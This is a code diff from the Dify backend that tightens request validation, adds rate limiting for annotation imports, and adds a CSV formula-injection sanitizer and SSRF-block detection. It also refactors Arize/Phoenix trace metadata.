if file_size == 0:
raise ValueError("The uploaded file is empty")
return AppAnnotationService.batch_import_app_annotations(app_id, file)

View File

@ -114,7 +114,7 @@ class AppTriggersApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/trigger-enable")
class AppTriggerEnableApi(Resource):
@console_ns.expect(console_ns.models[ParserEnable.__name__], validate=True)
@console_ns.expect(console_ns.models[ParserEnable.__name__])
@setup_required
@login_required
@account_initialization_required

View File

@ -230,6 +230,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool
VectorType.CLICKZETTA,
VectorType.BAIDU,
VectorType.ALIBABACLOUD_MYSQL,
VectorType.IRIS,
}
semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]}

View File

@ -26,7 +26,7 @@ console_ns.schema_model(Parser.__name__, Parser.model_json_schema(ref_template=D
@console_ns.route("/rag/pipelines/<uuid:pipeline_id>/workflows/published/datasource/nodes/<string:node_id>/preview")
class DataSourceContentPreviewApi(Resource):
@console_ns.expect(console_ns.models[Parser.__name__], validate=True)
@console_ns.expect(console_ns.models[Parser.__name__])
@setup_required
@login_required
@account_initialization_required

View File

@ -2,7 +2,7 @@ import logging
from typing import Any, Literal
from uuid import UUID
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, field_validator
from werkzeug.exceptions import InternalServerError, NotFound
import services
@ -52,10 +52,24 @@ class ChatMessagePayload(BaseModel):
inputs: dict[str, Any]
query: str
files: list[dict[str, Any]] | None = None
conversation_id: UUID | None = None
parent_message_id: UUID | None = None
conversation_id: str | None = None
parent_message_id: str | None = None
retriever_from: str = Field(default="explore_app")
@field_validator("conversation_id", "parent_message_id", mode="before")
@classmethod
def normalize_uuid(cls, value: str | UUID | None) -> str | None:
"""
Accept blank IDs and validate UUID format when provided.
"""
if not value:
return None
try:
return helper.uuid_value(value)
except ValueError as exc:
raise ValueError("must be a valid UUID") from exc
register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload)

View File

@ -3,7 +3,7 @@ from uuid import UUID
from flask import request
from flask_restx import marshal_with
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, model_validator
from sqlalchemy.orm import Session
from werkzeug.exceptions import NotFound
@ -30,9 +30,16 @@ class ConversationListQuery(BaseModel):
class ConversationRenamePayload(BaseModel):
name: str
name: str | None = None
auto_generate: bool = False
@model_validator(mode="after")
def validate_name_requirement(self):
if not self.auto_generate:
if self.name is None or not self.name.strip():
raise ValueError("name is required when auto_generate is false")
return self
register_schema_models(console_ns, ConversationListQuery, ConversationRenamePayload)

View File

@ -282,9 +282,10 @@ class ModelProviderModelCredentialApi(Resource):
tenant_id=tenant_id, provider_name=provider
)
else:
model_type = args.model_type
# Normalize model_type to the origin value stored in DB (e.g., "text-generation" for LLM)
normalized_model_type = args.model_type.to_origin_model_type()
available_credentials = model_provider_service.provider_manager.get_provider_model_available_credentials(
tenant_id=tenant_id, provider_name=provider, model_type=model_type, model_name=args.model
tenant_id=tenant_id, provider_name=provider, model_type=normalized_model_type, model_name=args.model
)
return jsonable_encoder(

View File

@ -46,8 +46,8 @@ class PluginDebuggingKeyApi(Resource):
class ParserList(BaseModel):
page: int = Field(default=1)
page_size: int = Field(default=256)
page: int = Field(default=1, ge=1, description="Page number")
page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)")
reg(ParserList)
@ -106,8 +106,8 @@ class ParserPluginIdentifierQuery(BaseModel):
class ParserTasks(BaseModel):
page: int
page_size: int
page: int = Field(default=1, ge=1, description="Page number")
page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)")
class ParserMarketplaceUpgrade(BaseModel):

View File

@ -331,3 +331,91 @@ def is_admin_or_owner_required(f: Callable[P, R]):
return f(*args, **kwargs)
return decorated_function
def annotation_import_rate_limit(view: Callable[P, R]):
"""
Rate limiting decorator for annotation import operations.
Implements sliding window rate limiting with two tiers:
- Short-term: Configurable requests per minute (default: 5)
- Long-term: Configurable requests per hour (default: 20)
Uses Redis ZSET for distributed rate limiting across multiple instances.
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_, current_tenant_id = current_account_with_tenant()
current_time = int(time.time() * 1000)
# Check per-minute rate limit
minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min"
redis_client.zadd(minute_key, {current_time: current_time})
redis_client.zremrangebyscore(minute_key, 0, current_time - 60000)
minute_count = redis_client.zcard(minute_key)
redis_client.expire(minute_key, 120) # 2 minutes TTL
if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:
abort(
429,
f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} "
f"requests per minute allowed. Please try again later.",
)
# Check per-hour rate limit
hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour"
redis_client.zadd(hour_key, {current_time: current_time})
redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000)
hour_count = redis_client.zcard(hour_key)
redis_client.expire(hour_key, 7200) # 2 hours TTL
if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:
abort(
429,
f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} "
f"requests per hour allowed. Please try again later.",
)
return view(*args, **kwargs)
return decorated
def annotation_import_concurrency_limit(view: Callable[P, R]):
"""
Concurrency control decorator for annotation import operations.
Limits the number of concurrent import tasks per tenant to prevent
resource exhaustion and ensure fair resource allocation.
Uses Redis ZSET to track active import jobs with automatic cleanup
of stale entries (jobs older than 2 minutes).
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_, current_tenant_id = current_account_with_tenant()
current_time = int(time.time() * 1000)
active_jobs_key = f"annotation_import_active:{current_tenant_id}"
# Clean up stale entries (jobs that should have completed or timed out)
stale_threshold = current_time - 120000 # 2 minutes ago
redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold)
# Check current active job count
active_count = redis_client.zcard(active_jobs_key)
if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT:
abort(
429,
f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} "
f"concurrent imports allowed per workspace. Please wait for existing imports to complete.",
)
# Allow the request to proceed
# The actual job registration will happen in the service layer
return view(*args, **kwargs)
return decorated

View File

@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel):
@classmethod
def normalize_conversation_id(cls, value: str | UUID | None) -> str | None:
"""Allow missing or blank conversation IDs; enforce UUID format when provided."""
if isinstance(value, str):
value = value.strip()
if not value:
return None

View File

@ -4,7 +4,7 @@ from uuid import UUID
from flask import request
from flask_restx import Resource
from flask_restx._http import HTTPStatus
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, model_validator
from sqlalchemy.orm import Session
from werkzeug.exceptions import BadRequest, NotFound
@ -37,9 +37,16 @@ class ConversationListQuery(BaseModel):
class ConversationRenamePayload(BaseModel):
name: str = Field(description="New conversation name")
name: str | None = Field(default=None, description="New conversation name (required if auto_generate is false)")
auto_generate: bool = Field(default=False, description="Auto-generate conversation name")
@model_validator(mode="after")
def validate_name_requirement(self):
if not self.auto_generate:
if self.name is None or not self.name.strip():
raise ValueError("name is required when auto_generate is false")
return self
class ConversationVariablesQuery(BaseModel):
last_id: UUID | None = Field(default=None, description="Last variable ID for pagination")

View File

@ -33,7 +33,7 @@ def trigger_endpoint(endpoint_id: str):
if response:
break
if not response:
logger.error("Endpoint not found for {endpoint_id}")
logger.info("Endpoint not found for %s", endpoint_id)
return jsonify({"error": "Endpoint not found"}), 404
return response
except ValueError as e:

0
api/core/db/__init__.py Normal file
View File

View File

@ -0,0 +1,38 @@
from sqlalchemy import Engine
from sqlalchemy.orm import Session, sessionmaker
_session_maker: sessionmaker | None = None
def configure_session_factory(engine: Engine, expire_on_commit: bool = False):
"""Configure the global session factory"""
global _session_maker
_session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit)
def get_session_maker() -> sessionmaker:
if _session_maker is None:
raise RuntimeError("Session factory not configured. Call configure_session_factory() first.")
return _session_maker
def create_session() -> Session:
return get_session_maker()()
# Class wrapper for convenience
class SessionFactory:
@staticmethod
def configure(engine: Engine, expire_on_commit: bool = False):
configure_session_factory(engine, expire_on_commit)
@staticmethod
def get_session_maker() -> sessionmaker:
return get_session_maker()
@staticmethod
def create_session() -> Session:
return create_session()
session_factory = SessionFactory()

View File

@ -1,4 +1,4 @@
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, field_validator
class PreviewDetail(BaseModel):
@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel):
class PipelineDataset(BaseModel):
id: str
name: str
description: str | None = Field(default="", description="knowledge dataset description")
description: str = Field(default="", description="knowledge dataset description")
chunk_structure: str
@field_validator("description", mode="before")
@classmethod
def normalize_description(cls, value: str | None) -> str:
"""Coerce None to empty string so description is always a string."""
if value is None:
return ""
return value
class PipelineDocument(BaseModel):
id: str

View File

@ -213,12 +213,23 @@ class MCPProviderEntity(BaseModel):
return None
def retrieve_tokens(self) -> OAuthTokens | None:
"""OAuth tokens if available"""
"""Retrieve OAuth tokens if authentication is complete.
Returns:
OAuthTokens if the provider has been authenticated, None otherwise.
"""
if not self.credentials:
return None
credentials = self.decrypt_credentials()
access_token = credentials.get("access_token", "")
# Return None if access_token is empty to avoid generating an invalid "Authorization: Bearer " header.
# Note: We don't check for whitespace-only strings here because:
# 1. OAuth servers don't return whitespace-only access tokens in practice
# 2. Even if they did, the server would return 401, triggering the OAuth flow correctly
if not access_token:
return None
return OAuthTokens(
access_token=credentials.get("access_token", ""),
access_token=access_token,
token_type=credentials.get("token_type", DEFAULT_TOKEN_TYPE),
expires_in=int(credentials.get("expires_in", str(DEFAULT_EXPIRES_IN)) or DEFAULT_EXPIRES_IN),
refresh_token=credentials.get("refresh_token", ""),

View File

@ -0,0 +1,89 @@
"""CSV sanitization utilities to prevent formula injection attacks."""
from typing import Any
class CSVSanitizer:
"""
Sanitizer for CSV export to prevent formula injection attacks.
This class provides methods to sanitize data before CSV export by escaping
characters that could be interpreted as formulas by spreadsheet applications
(Excel, LibreOffice, Google Sheets).
Formula injection occurs when user-controlled data starting with special
characters (=, +, -, @, tab, carriage return) is exported to CSV and opened
in a spreadsheet application, potentially executing malicious commands.
"""
# Characters that can start a formula in Excel/LibreOffice/Google Sheets
FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"})
@classmethod
def sanitize_value(cls, value: Any) -> str:
"""
Sanitize a value for safe CSV export.
Prefixes formula-initiating characters with a single quote to prevent
Excel/LibreOffice/Google Sheets from treating them as formulas.
Args:
value: The value to sanitize (will be converted to string)
Returns:
Sanitized string safe for CSV export
Examples:
>>> CSVSanitizer.sanitize_value("=1+1")
"'=1+1"
>>> CSVSanitizer.sanitize_value("Hello World")
"Hello World"
>>> CSVSanitizer.sanitize_value(None)
""
"""
if value is None:
return ""
# Convert to string
str_value = str(value)
# If empty, return as is
if not str_value:
return ""
# Check if first character is a formula initiator
if str_value[0] in cls.FORMULA_CHARS:
# Prefix with single quote to escape
return f"'{str_value}"
return str_value
@classmethod
def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]:
"""
Sanitize specified fields in a dictionary.
Args:
data: Dictionary containing data to sanitize
fields_to_sanitize: List of field names to sanitize.
If None, sanitizes all string fields.
Returns:
Dictionary with sanitized values (creates a shallow copy)
Examples:
>>> data = {"question": "=1+1", "answer": "+calc", "id": "123"}
>>> CSVSanitizer.sanitize_dict(data, ["question", "answer"])
{"question": "'=1+1", "answer": "'+calc", "id": "123"}
"""
sanitized = data.copy()
if fields_to_sanitize is None:
# Sanitize all string fields
fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)]
for field in fields_to_sanitize:
if field in sanitized:
sanitized[field] = cls.sanitize_value(sanitized[field])
return sanitized
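A usage sketch of CSVSanitizer on export rows, combined with the standard csv module (CSVSanitizer is the class defined above, imported from wherever the new module lands; the row values are illustrative):

import csv
import io

rows = [
    {"id": "1", "question": '=HYPERLINK("http://evil","click")', "answer": "+2+2"},
    {"id": "2", "question": "What is Dify?", "answer": "An LLM app platform"},
]
safe_rows = [CSVSanitizer.sanitize_dict(row, ["question", "answer"]) for row in rows]
# safe_rows[0]["question"] starts with a leading single quote; row 2 is unchanged

buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=["id", "question", "answer"])
writer.writeheader()
writer.writerows(safe_rows)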

View File

@ -9,6 +9,7 @@ import httpx
from configs import dify_config
from core.helper.http_client_pooling import get_pooled_http_client
from core.tools.errors import ToolSSRFError
logger = logging.getLogger(__name__)
@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs):
while retries <= max_retries:
try:
response = client.request(method=method, url=url, **kwargs)
# Check for SSRF protection by Squid proxy
if response.status_code in (401, 403):
# Check if this is a Squid SSRF rejection
server_header = response.headers.get("server", "").lower()
via_header = response.headers.get("via", "").lower()
# Squid typically identifies itself in Server or Via headers
if "squid" in server_header or "squid" in via_header:
raise ToolSSRFError(
f"Access to '{url}' was blocked by SSRF protection. "
f"The URL may point to a private or local network address. "
)
if response.status_code not in STATUS_FORCELIST:
return response
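The Squid detection above keys off the Server/Via response headers; an isolated sketch of that check on a fabricated httpx response (header values are illustrative):

import httpx

blocked = httpx.Response(403, headers={"Server": "squid/5.7", "Via": "1.1 proxy (squid/5.7)"})
server_header = blocked.headers.get("server", "").lower()
via_header = blocked.headers.get("via", "").lower()
print("squid" in server_header or "squid" in via_header)  # True -> make_request would raise ToolSSRFError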

View File

@ -72,15 +72,22 @@ class LLMGenerator:
prompt_messages=list(prompts), model_parameters={"max_tokens": 500, "temperature": 1}, stream=False
)
answer = cast(str, response.message.content)
cleaned_answer = re.sub(r"^.*(\{.*\}).*$", r"\1", answer, flags=re.DOTALL)
if cleaned_answer is None:
if answer is None:
return ""
try:
result_dict = json.loads(cleaned_answer)
answer = result_dict["Your Output"]
result_dict = json.loads(answer)
except json.JSONDecodeError:
logger.exception("Failed to generate name after answer, use query instead")
result_dict = json_repair.loads(answer)
if not isinstance(result_dict, dict):
answer = query
else:
output = result_dict.get("Your Output")
if isinstance(output, str) and output.strip():
answer = output.strip()
else:
answer = query
name = answer.strip()
if len(name) > 75:
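A small sketch of the json.loads to json_repair fallback introduced above, using a deliberately truncated model answer (json_repair can usually close the missing brace; the string is illustrative):

import json
import json_repair

answer = '{"Your Output": "Quarterly revenue questions"'   # truncated JSON from the model
try:
    result_dict = json.loads(answer)
except json.JSONDecodeError:
    result_dict = json_repair.loads(answer)                # best-effort repair

output = result_dict.get("Your Output") if isinstance(result_dict, dict) else None
name = output.strip() if isinstance(output, str) and output.strip() else "fallback query"
print(name)  # "Quarterly revenue questions"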

View File

@ -6,7 +6,13 @@ from datetime import datetime, timedelta
from typing import Any, Union, cast
from urllib.parse import urlparse
from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes
from openinference.semconv.trace import (
MessageAttributes,
OpenInferenceMimeTypeValues,
OpenInferenceSpanKindValues,
SpanAttributes,
ToolCallAttributes,
)
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter
from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter
from opentelemetry.sdk import trace as trace_sdk
@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra
def datetime_to_nanos(dt: datetime | None) -> int:
"""Convert datetime to nanoseconds since epoch. If None, use current time."""
"""Convert datetime to nanoseconds since epoch for Arize/Phoenix."""
if dt is None:
dt = datetime.now()
return int(dt.timestamp() * 1_000_000_000)
def error_to_string(error: Exception | str | None) -> str:
"""Convert an error to a string with traceback information."""
"""Convert an error to a string with traceback information for Arize/Phoenix."""
error_message = "Empty Stack Trace"
if error:
if isinstance(error, Exception):
@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str:
def set_span_status(current_span: Span, error: Exception | str | None = None):
"""Set the status of the current span based on the presence of an error."""
"""Set the status of the current span based on the presence of an error for Arize/Phoenix."""
if error:
error_string = error_to_string(error)
current_span.set_status(Status(StatusCode.ERROR, error_string))
@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None):
def safe_json_dumps(obj: Any) -> str:
"""A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded."""
"""A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix."""
return json.dumps(obj, default=str, ensure_ascii=False)
def wrap_span_metadata(metadata, **kwargs):
"""Add common metatada to all trace entity types for Arize/Phoenix."""
metadata["created_from"] = "Dify"
metadata.update(kwargs)
return metadata
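A usage sketch of wrap_span_metadata; note that it updates the passed dict in place and returns it, so the caller and the helper share one dict (values are illustrative):

trace_metadata = {"app_id": "app-123", "user_id": "user-456"}
metadata = wrap_span_metadata(
    trace_metadata,
    trace_entity_type="workflow",
    status="succeeded",
    total_tokens=128,
)
# metadata is trace_metadata: it now also carries created_from="Dify" plus the keyword overrides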
class ArizePhoenixDataTrace(BaseTraceInstance):
def __init__(
self,
@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
raise
def workflow_trace(self, trace_info: WorkflowTraceInfo):
workflow_metadata = {
"workflow_run_id": trace_info.workflow_run_id or "",
"message_id": trace_info.message_id or "",
"workflow_app_log_id": trace_info.workflow_app_log_id or "",
"status": trace_info.workflow_run_status or "",
"status_message": trace_info.error or "",
"level": "ERROR" if trace_info.error else "DEFAULT",
"total_tokens": trace_info.total_tokens or 0,
}
workflow_metadata.update(trace_info.metadata)
file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else []
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.workflow_run_status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="workflow",
conversation_id=trace_info.conversation_id or "",
workflow_app_log_id=trace_info.workflow_app_log_id or "",
workflow_id=trace_info.workflow_id or "",
tenant_id=trace_info.tenant_id or "",
workflow_run_id=trace_info.workflow_run_id or "",
workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0,
workflow_run_version=trace_info.workflow_run_version or "",
total_tokens=trace_info.total_tokens or 0,
file_list=safe_json_dumps(file_list),
query=trace_info.query or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id
self.ensure_root_span(dify_trace_id)
@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
workflow_span = self.tracer.start_span(
name=TraceTaskName.WORKFLOW_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False),
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.conversation_id or "",
},
start_time=datetime_to_nanos(trace_info.start_time),
@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
"app_id": app_id,
"app_name": node_execution.title,
"status": node_execution.status,
"status_message": node_execution.error or "",
"level": "ERROR" if node_execution.status == "failed" else "DEFAULT",
}
)
@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
node_span = self.tracer.start_span(
name=node_execution.node_type,
attributes={
SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value,
SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value,
SpanAttributes.METADATA: safe_json_dumps(node_metadata),
SpanAttributes.SESSION_ID: trace_info.conversation_id or "",
},
@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def message_trace(self, trace_info: MessageTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.")
return
file_list = cast(list[str], trace_info.file_list) or []
file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else []
message_file_data: MessageFile | None = trace_info.message_file_data
if message_file_data is not None:
file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else ""
file_list.append(file_url)
message_metadata = {
"message_id": trace_info.message_id or "",
"conversation_mode": str(trace_info.conversation_mode or ""),
"user_id": trace_info.message_data.from_account_id or "",
"file_list": json.dumps(file_list),
"status": trace_info.message_data.status or "",
"status_message": trace_info.error or "",
"level": "ERROR" if trace_info.error else "DEFAULT",
"total_tokens": trace_info.total_tokens or 0,
"prompt_tokens": trace_info.message_tokens or 0,
"completion_tokens": trace_info.answer_tokens or 0,
"ls_provider": trace_info.message_data.model_provider or "",
"ls_model_name": trace_info.message_data.model_id or "",
}
message_metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="message",
conversation_model=trace_info.conversation_model or "",
message_tokens=trace_info.message_tokens or 0,
answer_tokens=trace_info.answer_tokens or 0,
total_tokens=trace_info.total_tokens or 0,
conversation_mode=trace_info.conversation_mode or "",
gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0,
llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0,
is_streaming_request=trace_info.is_streaming_request or False,
user_id=trace_info.message_data.from_account_id or "",
file_list=safe_json_dumps(file_list),
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
)
# Add end user data if available
if trace_info.message_data.from_end_user_id:
@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first()
)
if end_user_data is not None:
message_metadata["end_user_id"] = end_user_data.session_id
metadata["end_user_id"] = end_user_data.session_id
attributes = {
SpanAttributes.INPUT_VALUE: trace_info.message_data.query,
SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer,
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id,
SpanAttributes.INPUT_VALUE: trace_info.message_data.query,
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value,
SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer,
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "",
}
dify_trace_id = trace_info.trace_id or trace_info.message_id
@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
try:
# Convert outputs to string based on type
outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value
if isinstance(trace_info.outputs, dict | list):
outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False)
outputs_str = safe_json_dumps(trace_info.outputs)
outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value
elif isinstance(trace_info.outputs, str):
outputs_str = trace_info.outputs
else:
@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
llm_attributes = {
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value,
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: outputs_str,
SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id,
SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "",
}
llm_attributes.update(self._construct_llm_attributes(trace_info.inputs))
if trace_info.total_tokens is not None and trace_info.total_tokens > 0:
@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def moderation_trace(self, trace_info: ModerationTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.")
return
metadata = {
"message_id": trace_info.message_id,
"tool_name": "moderation",
"status": trace_info.message_data.status,
"status_message": trace_info.message_data.error or "",
"level": "ERROR" if trace_info.message_data.error else "DEFAULT",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.message_data.error or "",
level="ERROR" if trace_info.message_data.error else "DEFAULT",
trace_entity_type="moderation",
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.MODERATION_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value,
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(
{
"action": trace_info.action,
"flagged": trace_info.flagged,
"action": trace_info.action,
"preset_response": trace_info.preset_response,
"inputs": trace_info.inputs,
},
ensure_ascii=False,
"query": trace_info.query,
}
),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
},
start_time=datetime_to_nanos(trace_info.start_time),
context=root_span_context,
@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.")
return
start_time = trace_info.start_time or trace_info.message_data.created_at
end_time = trace_info.end_time or trace_info.message_data.updated_at
metadata = {
"message_id": trace_info.message_id,
"tool_name": "suggested_question",
"status": trace_info.status,
"status_message": trace_info.error or "",
"level": "ERROR" if trace_info.error else "DEFAULT",
"total_tokens": trace_info.total_tokens,
"ls_provider": trace_info.model_provider or "",
"ls_model_name": trace_info.model_id or "",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.status or "",
status_message=trace_info.status_message or "",
level=trace_info.level or "",
trace_entity_type="suggested_question",
total_tokens=trace_info.total_tokens or 0,
from_account_id=trace_info.from_account_id or "",
agent_based=trace_info.agent_based or False,
from_source=trace_info.from_source or "",
model_provider=trace_info.model_provider or "",
model_id=trace_info.model_id or "",
workflow_run_id=trace_info.workflow_run_id or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value,
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
},
start_time=datetime_to_nanos(start_time),
context=root_span_context,
